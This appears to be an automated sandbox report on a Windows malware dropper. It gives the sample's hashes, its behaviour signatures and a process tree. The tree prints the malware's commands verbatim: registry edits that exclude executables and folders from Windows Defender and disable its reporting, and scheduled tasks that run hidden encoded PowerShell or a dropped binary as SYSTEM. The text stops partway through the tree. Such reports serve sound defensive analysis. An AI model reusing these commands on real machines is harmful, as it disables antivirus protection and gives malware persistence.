Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2023, 01:17

General

  • Target

    3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe

  • Size

    7.1MB

  • MD5

    22b6fb2e97afec315c96ae35145d24d5

  • SHA1

    d58e472d7e71b7e86c509b5913c3246917054966

  • SHA256

    3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be

  • SHA512

    91e7f6efb08117be50187a181ebf6e5ffdfa362cea905889be63b010fa89492bb0ae3710771752b9e2e4b4b38f8d5d359ce8450bf5634d3e76f5c432d4e725f0

  • SSDEEP

    196608:91OeVRGMxLNyzxhshZJ+CjfKWg04aj7F0Ad:3OkRGMxLUhshSJn0BFF

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 29 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe
    "C:\Users\Admin\AppData\Local\Temp\3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4884
    • C:\Users\Admin\AppData\Local\Temp\7zS949F.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3252
      • C:\Users\Admin\AppData\Local\Temp\7zS95D7.tmp\Install.exe
        .\Install.exe /Tndidsl "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1576
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:564
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:1664
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:4800
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2676
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4344
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1176
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4428
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gfQMiTYvb" /SC once /ST 00:04:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1260
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gfQMiTYvb"
                  4⤵
                    PID:1088
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gfQMiTYvb"
                    4⤵
                      PID:876
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bRiKnmLOZFdkMPGuzv" /SC once /ST 01:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\bSZuSHX.exe\" Gy /NQsite_idILM 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:3188
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4656
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:3432
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:2720
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:5060
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:60
                      • C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\bSZuSHX.exe
                        C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\bSZuSHX.exe Gy /NQsite_idILM 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:4788
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:564
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:212
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:4772
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:4896
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:3156
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4224
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:1644
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:4300
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:1524
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:2548
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:5012
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4440
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:4428
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:2536
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:4868
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:2296
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:3972
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:2424
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:1188
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:3388
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:4156
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:1516
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:520
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:376
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:4736
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:5112
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                              PID:2228
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:2208
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:3104
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:368
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EUszDIIxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EUszDIIxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FncWqVonEAflrVaxqNR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FncWqVonEAflrVaxqNR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IjchgTxaUtSoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IjchgTxaUtSoC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\abetkicELaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\abetkicELaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rFkCZBmYGfkU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rFkCZBmYGfkU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtwSUYpchTTJbcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtwSUYpchTTJbcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qMfgxxkvaFNxVGCk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qMfgxxkvaFNxVGCk\" /t REG_DWORD /d 0 /reg:64;"
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1732
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:32
                                                                                    3⤵
                                                                                      PID:2800
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                          PID:1920
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUszDIIxU" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:476
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FncWqVonEAflrVaxqNR" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2284
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FncWqVonEAflrVaxqNR" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:2640
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjchgTxaUtSoC" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:4752
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjchgTxaUtSoC" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:416
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abetkicELaUn" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:2004
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abetkicELaUn" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:2148
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rFkCZBmYGfkU2" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:3056
                                                                                                      • C:\Windows\SysWOW64\reg.exe
